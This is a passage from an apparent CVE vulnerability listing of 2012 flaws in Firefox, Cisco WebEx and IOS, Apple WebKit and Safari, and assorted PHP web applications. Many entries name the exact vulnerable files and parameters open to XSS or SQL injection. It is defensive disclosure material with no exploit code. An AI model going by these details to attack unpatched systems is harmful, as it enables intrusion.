chrome privileges to Reader Mode pages, which allows user-assisted remote attackers to bypass intended access restrictions via a crafted web site. [CVE-2012-3984] Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey before 2.13 do not properly handle navigation away from a web page that has a SELECT element's menu active, which allows remote attackers to spoof page content via vectors involving absolute positioning and scrolling. [CVE-2012-3980] The web console in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, and Thunderbird ESR 10.x before 10.0.7 allows user-assisted remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site that injects this code and triggers an eval operation. [CVE-2012-3979] Mozilla Firefox before 15.0 on Android does not properly implement unspecified callers of the __android_log_print function, which allows remote attackers to execute arbitrary code via a crafted web page that calls the JavaScript dump function. [CVE-2012-3976] Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, and SeaMonkey before 2.12 do not properly handle onLocationChange events during navigation between different https sites, which allows remote attackers to spoof the X.509 certificate information in the address bar via a crafted web page. [CVE-2012-3968] Use-after-free vulnerability in the WebGL implementation in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, Thunderbird ESR 10.x before 10.0.7, and SeaMonkey before 2.12 allows remote attackers to execute arbitrary code via vectors related to deletion of a fragment shader by its accessor. [CVE-2012-3967] The WebGL implementation in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, Thunderbird ESR 10.x before 10.0.7, and SeaMonkey before 2.12 on Linux, when a large number of sampler uniforms are used, does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (stack memory corruption) via a crafted web site. [CVE-2012-3965] Mozilla Firefox before 15.0 does not properly restrict navigation to the about:newtab page, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site that triggers creation of a new tab and then a new window. [CVE-2012-3952] Cross-site scripting (XSS) vulnerability in admin/index.php in phpList before 2.10.19 allows remote attackers to inject arbitrary web script or HTML via the unconfirmed parameter to the user page. [CVE-2012-3941] Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz72850. [CVE-2012-3940] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz72958. [CVE-2012-3939] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted WRF file, aka Bug ID CSCua61331. [CVE-2012-3938] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz73583. [CVE-2012-3937] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz72967. [CVE-2012-3936] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCua40962. [CVE-2012-3924] The SSLVPN implementation in Cisco IOS 15.1 and 15.2, when DTLS is enabled, does not properly handle certain outbound ACL configurations, which allows remote authenticated users to cause a denial of service (device crash) via a session involving a PPP over ATM (PPPoA) interface, aka Bug ID CSCty97961. [CVE-2012-3923] The SSLVPN implementation in Cisco IOS 12.4, 15.0, 15.1, and 15.2, when DTLS is not enabled, does not properly handle certain outbound ACL configurations, which allows remote authenticated users to cause a denial of service (device crash) via a session involving a PPP over ATM (PPPoA) interface, aka Bug ID CSCte41827. [CVE-2012-3913] The Cisco VC220 and VC240 cameras allow remote attackers to cause a denial of service (WebUI outage) via crafted packets, aka Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019. [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684. [CVE-2012-3872] Multiple cross-site scripting (XSS) vulnerabilities in Open Constructor 3.12.0 allow remote attackers to inject arbitrary web script or HTML via (1) the result parameter to data/file/edit.php, (2) the q parameter to confirm.php, or (3) the keyword parameter to users/users.php. [CVE-2012-3871] Cross-site scripting (XSS) vulnerability in data/hybrid/i_hybrid.php in Open Constructor 3.12.0 allows remote authenticated users to inject arbitrary web script or HTML via the header parameter. [CVE-2012-3870] Multiple cross-site scripting (XSS) vulnerabilities in objects/createobject.php in Open Constructor 3.12.0 allow remote authenticated users to inject arbitrary web script or HTML via the (1) name or (2) description parameter. [CVE-2012-3869] Cross-site scripting (XSS) vulnerability in include/classes/class.rex_list.inc.php in REDAXO 4.3.x and 4.4 allows remote attackers to inject arbitrary web script or HTML via the subpage parameter to index.php. [CVE-2012-3859] Unspecified vulnerability in the WebAdmin Portal in Netsweeper has unknown impact and attack vectors, a different vulnerability than CVE-2012-2446 and CVE-2012-2447. [CVE-2012-3848] Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php. [CVE-2012-3846] Cross-site scripting (XSS) vulnerability in index.php in PHP-pastebin 2.1 allows remote attackers to inject arbitrary web script or HTML via the title parameter. [CVE-2012-3844] Cross-site scripting (XSS) vulnerability in vBulletin 4.1.12 allows remote attackers to inject arbitrary web script or HTML via a long string in the subject parameter when creating a post. [CVE-2012-3843] Cross-site scripting (XSS) vulnerability in the registration page in e107, probably 1.0.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters. [CVE-2012-3840] Multiple cross-site scripting (XSS) vulnerabilities in index.php/users/form/user_id in MyClientBase 0.12 allow remote attackers to inject arbitrary web script or HTML via the (1) first_name or (2) last_name parameters. [CVE-2012-3837] Multiple cross-site scripting (XSS) vulnerabilities in apps/users/registration.template.php in Baby Gekko 1.2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) email_address, (3) password, (4) password_verify, (5) firstname, (6) lastname, or (7) verification_code parameter to users/action/register. NOTE: some of these details are obtained from third party information. [CVE-2012-3836] Multiple cross-site scripting (XSS) vulnerabilities in Baby Gekko before 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) groupname parameter in a savecategory in the users module [CVE-2012-3835] Multiple cross-site scripting (XSS) vulnerabilities in AlienVault Open Source Security Information Management (OSSIM) 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to top.php or (2) time[0][0] parameter to forensics/base_qry_main.php, which is not properly handled in an error page. [CVE-2012-3833] Cross-site scripting (XSS) vulnerability in the default index page in admin/ in Quick.CMS 4.0 allows remote attackers to inject arbitrary web script or HTML via the p parameter. [CVE-2012-3832] Cross-site scripting (XSS) vulnerability in decoda/Decoda.php in Decoda before 3.2 allows remote attackers to inject arbitrary web script or HTML via vectors related to (1) b or (2) div tags. [CVE-2012-3831] Cross-site scripting (XSS) vulnerability in decoda/templates/video.php in Decoda before 3.3.1 allows remote attackers to inject arbitrary web script or HTML via multiple URLs in an img tag. [CVE-2012-3830] Cross-site scripting (XSS) vulnerability in decoda/templates/video.php in Decoda before 3.3.3 allows remote attackers to inject arbitrary web script or HTML via the video directive. [CVE-2012-3828] Cross-site scripting (XSS) vulnerability in Joomla! 2.5.3 allows remote attackers to inject arbitrary web script or HTML via the Host HTTP Header. [CVE-2012-3819] Stack consumption vulnerability in dartwebserver.dll 1.9 and earlier, as used in Dart PowerTCP WebServer for ActiveX and other products, allows remote attackers to cause a denial of service (daemon crash) via a long request. [CVE-2012-3805] Multiple cross-site scripting (XSS) vulnerabilities in the getAllPassedParams function in system/functions.php in Kajona before 3.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) absender_name, (2) absender_email, or (3) absender_nachricht parameter to the content page [CVE-2012-3800] Cross-site scripting (XSS) vulnerability in og.js in the Organic Groups (OG) module 6.x-2.x before 6.x-2.4 for Drupal, when used with the Vertical Tabs module, allows remote authenticated users to inject arbitrary web script or HTML via vectors related the group title. [CVE-2012-3791] Multiple SQL injection vulnerabilities in Simple Web Content Management System 1.1 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) item_delete.php, (2) item_status.php, (3) item_detail.php, (4) item_modify.php, or (5) item_position.php in admin/ [CVE-2012-3790] Cross-site scripting (XSS) vulnerability in index.php in Adiscon LogAnalyzer before 3.4.4 and 3.5.x before 3.5.5 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter in a Search action. [CVE-2012-3748] Race condition in WebKit in Apple iOS before 6.0.1 and Safari before 6.0.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving JavaScript arrays. [CVE-2012-3747] WebKit, as used in Apple iOS before 6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. [CVE-2012-3746] UIWebView in UIKit in Apple iOS before 6 does not properly use the Data Protection feature, which allows context-dependent attackers to obtain cleartext file content by leveraging direct access to a device's filesystem. [CVE-2012-3742] Safari in Apple iOS before 6 does not properly restrict use of an unspecified Unicode character that looks similar to the https lock indicator, which allows remote attackers to spoof https connections by placing this character in the TITLE element of a web page. [CVE-2012-3729] The Berkeley Packet Filter (BPF) interpreter implementation in the kernel in Apple iOS before 6 accesses uninitialized memory locations, which allows local users to obtain sensitive information about the layout of kernel memory via a crafted program that uses a BPF interface. [CVE-2012-3721] Profile Manager in Apple Mac OS X before 10.7.5 does not properly perform authentication for the Device Management private interface, which allows attackers to enumerate managed devices via unspecified vectors. [CVE-2012-3719] Mail in Apple Mac OS X before 10.7.5 does not properly handle embedded web plugins, which allows remote attackers to execute arbitrary plugin code via an e-mail message that triggers the loading of a third-party plugin. [CVE-2012-3714] The Form Autofill feature in Apple Safari before 6.0.1 does not restrict the filled fields to the set of fields contained in an Autofill popover, which allows remote attackers to obtain the Me card from an Address Book via a crafted web site. [CVE-2012-3712] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3711] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3710] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3709] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3708] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3707] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3706] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3705] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3704] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3703] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3702] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3701] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3700] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3699] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3697] WebKit in Apple Safari before 6.0 does not properly handle file: URLs, which allows remote attackers to bypass intended sandbox restrictions and read arbitrary files by leveraging a WebProcess compromise. [CVE-2012-3696] CRLF injection vulnerability in WebKit in Apple Safari before 6.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP request splitting attacks via a crafted web site that leverages improper WebSockets URI handling. [CVE-2012-3695] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 6.0 allows remote attackers to inject arbitrary web script or HTML by leveraging improper URL canonicalization during the handling of the location.href property. [CVE-2012-3694] WebKit in Apple Safari before 6.0 does not properly handle drag-and-drop events, which allows user-assisted remote attackers to obtain sensitive information about full pathnames via a crafted web site. [CVE-2012-3693] Incomplete blacklist vulnerability in WebKit in Apple Safari before 6.0 allows remote attackers to spoof domain names in URLs, and possibly conduct phishing attacks, by leveraging the availability of IDN support and Unicode fonts to construct unspecified homoglyphs. [CVE-2012-3692] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3691] WebKit in Apple Safari before 6.0 does not properly handle Cascading Style Sheets (CSS) property values, which allows remote attackers to bypass the Same Origin Policy via a crafted web site. [CVE-2012-3690] WebKit in Apple Safari before 6.0 does not properly handle drag-and-drop events, which allows user-assisted remote attackers to read arbitrary files via a crafted web site. [CVE-2012-3689] WebKit in Apple Safari before 6.0 does not properly handle drag-and-drop events, which allows user-assisted remote attackers to bypass the Same Origin Policy via a crafted web site. [CVE-2012-3688] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3687] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3686] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3685] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3684] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3683] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3682] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3681] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3680] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3679] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3678] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3677] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3676] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3675] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3674] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3673] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3672] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3671] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3670] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3669] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3668] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3667] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3666] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3665] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3664] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3663] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3661] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3660] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3659] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3658] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3657] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3656] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3655] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3654] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3653] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3652] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3651] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3650] WebKit in Apple Safari before 6.0 accesses uninitialized memory locations during the rendering of SVG images, which allows remote attackers to obtain sensitive information from process memory via a crafted web site. [CVE-2012-3649] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3648] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3647] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3646] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3645] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3644] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3643] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3642] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3641] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3640] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3639] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3638] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3637] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3636] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3635] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3634] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3633] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3632] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3631] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3630] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3629] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3628] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3627] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3626] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3625] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. [CVE-2012-3624] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3623] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1. [CVE-2012-3622] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs 